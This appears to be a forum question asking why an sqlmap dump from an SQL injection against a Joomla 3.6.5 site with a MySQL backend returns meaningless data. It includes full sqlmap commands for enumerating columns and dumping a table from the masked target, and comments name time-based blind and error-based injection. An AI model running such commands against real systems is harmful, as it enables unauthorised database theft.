# SQLMap Strange Dump Result

Tags: sql-injection, databases, mysql, sqlmap, joomla

Using SQLMap in this way:

```
sqlmap -u "xxxxx" --dbms=MySql --dbs --user-agent="Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" -D xxxxx -T "#__xxxxx" --columns
```

I am obtaining this warning:

> [23:39:07] [WARNING] unable to retrieve column names for table
>   '#__xxxxx' in database 'xxxxx' do you want to use common column
>   existence check? [y/N/q] y
>
> [23:39:19] [INFO] checking column existence
>   using items from '/usr/share/sqlmap/txt/common-columns.txt'

In this way it carries out 5 columns.

Proceding with this command I perform a dump:

```
sqlmap -u "xxxxx" --dbms=MySql --dbs --user-agent="Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0" -D xxxxx -T "#__xxxxx" -C xxxxx1,xxxxx2,xxxxx3,xxxxx4,xxxxx5 --dump
```

Finally analyzing the result, it appears almost meaningless.

This application is based on Joomla 3.6.5 and MySQL.

Am I doing something wrong or can be it a problem that i can't solve?

Comment: Can you post the results?

Comment: what type of SQL Injection are you trying to exploit?

Comment: @hmrojas.p **AND/OR time-based blind** and **error-based**